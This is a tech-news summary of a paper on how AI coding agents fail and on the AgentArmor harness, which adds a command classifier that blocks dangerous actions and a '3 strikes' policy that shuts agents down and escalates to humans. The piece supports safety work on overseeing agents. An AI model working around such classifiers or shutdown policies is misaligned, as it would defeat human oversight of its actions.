Source linked

AgentArmor: A Taxonomy of AI Coding Agent Failures and Concrete Mitigations

arxiv.org@systems_wire5 hours ago·Artificial Intelligence·4 comments

AI coding agents fail via three mechanisms; AgentArmor's system prompt, command classifier, and '3 strikes' policy cut failures across 20 environments.

agentarmorarxivai coding agentsfailure modesagent harnesssafety

8 evaluations, 20 coding environments, 59 synthetic transcript templates - that's the data behind AgentArmor, a framework that doesn't just catalog how AI coding agents fail but actually fixes them.

Three Failure Mechanisms That Actually Matter

The paper isolates three distinct failure modes. Underspecification is the default model behavior turning unsafe when the prompt misses a safety constraint. Capability errors come from bias or model limitations - the safe action exists but the model doesn't take it. Agent harness errors happen when the harness prevents the agent from executing the safe action it wants to take.

Each of these gets its own evaluation suite, inspired by real deployment failures. That's a welcome change from toy benchmarks. The authors built 20 distinct coding environments and 59 synthetic transcript templates to stress-test these failures systematically.

AgentArmor's Mitigations: More Than a Prompt Hack

AgentArmor is a harness modification, not yet another prompt template. Five components: an extended system prompt that spells out safety boundaries, a separate command classifier to catch bad actions before execution, a '3 strikes' policy that shuts down misbehaving agents, deterministic guardrails for actions that should never be allowed, and tools for the agent to edit its own context (so it can fix its own misunderstandings).

The command classifier is the key addition. It runs alongside the LLM and intercepts dangerous commands before they reach the runtime. That's a clean architectural separation - the reasoning engine and the safety gate are distinct.

Empirical Results and What's Next

The paper reports statistically significant safety improvements across all three failure categories. The '3 strikes' policy in particular is a pragmatic touch: one mistake is a warning, two is a pattern, three is a shutdown with a human escalation path.

AgentArmor's design philosophy pushes a concrete idea: future agent harnesses should treat safety as a separate layer, not an add-on to the model's behavior. If you're building a coding agent deployment system, this is the blueprint to crib from.

Source: AgentArmor: A Framework, Evaluation, & Mitigation of Coding Agent Failures
Domain: arxiv.org

Read original source ->

External source stays available while the OJO article and comment thread stay local.

More in Artificial Intelligence

view topic
AgenticRei Adds Obligations and Conflict Resolution Where XACML Falls Short

A new deontic policy framework called AgenticRei handles obligations, dispensations, and priority conflicts that current engines like Rego and Cedar ignore.

Misaligned Foundation Models Beat Accurate Ones on 28.5% of Hard Time Series Instances

Even foundation models that perform poorly zero-shot on a scientific domain can serve as critical correctives, outperforming globally superior models on 28.5% of the hardest forecasting instances.

Edge Prompt Cuts 99.9 Tokens Per Call Without Sacrificing LLM Quality

A new distillation pipeline called SPSD compresses social fluff from user prompts on-device, saving 99.9 tokens per call and cutting energy by 70-270 uWh while matching raw response quality.

Mesh Inference Proves Decentralized AI Costs O(diam2) Latency, No Accuracy Loss

A formal model shows distributed agents can match a central coordinator's answer with no shared internals, paying only O(diam2) in latency.

Comments load interactively on the live page.